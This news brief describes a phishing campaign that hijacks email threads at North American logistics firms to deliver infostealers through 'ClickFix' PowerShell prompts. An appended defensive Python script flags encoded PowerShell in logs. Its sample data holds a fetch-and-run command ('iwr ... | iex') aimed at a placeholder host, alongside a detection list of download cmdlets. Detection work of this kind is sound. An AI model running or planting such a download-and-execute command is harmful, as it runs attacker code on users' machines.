
New Phishing Campaign Targets North American Transport and Logistics Firms

Compromised cargo.
Ryan Uliss
Contributing Writer

Researchers are tracking a concerning malware campaign targeting transportation and logistics companies across North America. The threat actors behind the campaign use compromised legitimate email accounts to inject malicious content into ongoing email conversations, making the attacks appear more credible.

This campaign, which has been active since May 2024, involves a variety of malware payloads, including Lumma Stealer, StealC, and DanaBot. In recent months, the attackers have adapted their methods, employing new infrastructure and techniques such as “ClickFix” to deliver malware via Base64-encoded PowerShell scripts.

At this time, researchers have not determined how the attackers gained initial access to the compromised email accounts.

By impersonating industry-specific software like Samsara and Astra TMS, the attackers craft phishing emails that mimic the language and workflows common in the shipping and logistics sector. This suggests they research their targets thoroughly before launching their campaigns, which significantly increases the chances of a successful breach.

Why It Matters: Cybercriminals are refining their social engineering tactics to blend malicious activity seamlessly into real email conversations, increasing the risk of malware infection. By targeting transportation and logistics companies and impersonating specialized software, this campaign showcases a strategic focus on sectors crucial to supply chains and critical infrastructure. Organizations in these industries need to remain vigilant to avoid falling victim to increasingly sophisticated phishing tactics.

  • Compromised Legitimate Accounts: The threat actors use compromised email accounts from transportation companies, injecting malicious content into existing conversations, making it harder for victims to detect the threat.
  • Variety of Malware: From May to July 2024, the campaign delivered Lumma Stealer, StealC, and DanaBot. In August 2024, the attackers introduced the “ClickFix” technique, where victims are led through dialogue boxes to copy and paste a PowerShell script that downloads malware.
  • Targeted Sector: The campaign focuses on North American transport and logistics companies, impersonating software like Samsara and Astra TMS, which are commonly used in fleet management.
  • Financially Motivated: Researchers assess that these attacks are likely financially driven, though the actors remain unidentified. The use of commodity malware like DanaBot and third-party infrastructure points to involvement in the broader cybercriminal ecosystem, relying on widely available tools rather than custom malware.
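
One way to triage process-creation logs for the Base64-encoded PowerShell delivery described above, as an added example that is not from the article or the cited research: it decodes `-EncodedCommand` arguments and flags scripts that fetch or execute remote content. The sample command lines, the `example.invalid` URL and the indicator list are constructed for illustration.

```python
import base64
import binascii
import re

# Assumed indicator list: cmdlets/classes often present when a script
# downloads and runs remote content. Tune for your environment.
DOWNLOAD_HINTS = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|invoke-expression|\biex\b", re.I)

def encoded_payload(cmdline):
    """Return the decoded -EncodedCommand script from a command line, or None."""
    if not re.search(r"(?i)\b(powershell|pwsh)", cmdline):
        return None
    tokens = cmdline.split()
    for flag, value in zip(tokens[1:], tokens[2:]):
        name = flag.lstrip("-/").lower()
        # PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...) and -ec;
        # the flag may be introduced with - or /.
        if flag[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                raw = base64.b64decode(value.strip('"'), validate=True)
                return raw.decode("utf-16-le")  # PowerShell encodes as UTF-16LE
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None

def triage(cmdlines):
    """Return (cmdline, decoded_script) pairs whose decoded script matches a hint."""
    hits = []
    for line in cmdlines:
        script = encoded_payload(line)
        if script and DOWNLOAD_HINTS.search(script):
            hits.append((line, script))
    return hits

def _enc(script):
    """Build a constructed -EncodedCommand value for the sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample command lines (not taken from the campaign).
SAMPLE = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -w hidden -enc " + _enc("iwr https://example.invalid/fix.ps1 | iex"),
    "powershell.exe -EncodedCommand " + _enc("Get-Date"),
]

if __name__ == "__main__":
    for line, script in triage(SAMPLE):
        print("SUSPICIOUS:", script)
```
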

Go Deeper -> Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware – Proofpoint

Transportation Companies Hit by Cyberattacks Using Lumma Stealer and NetSupport Malware – The Hacker News
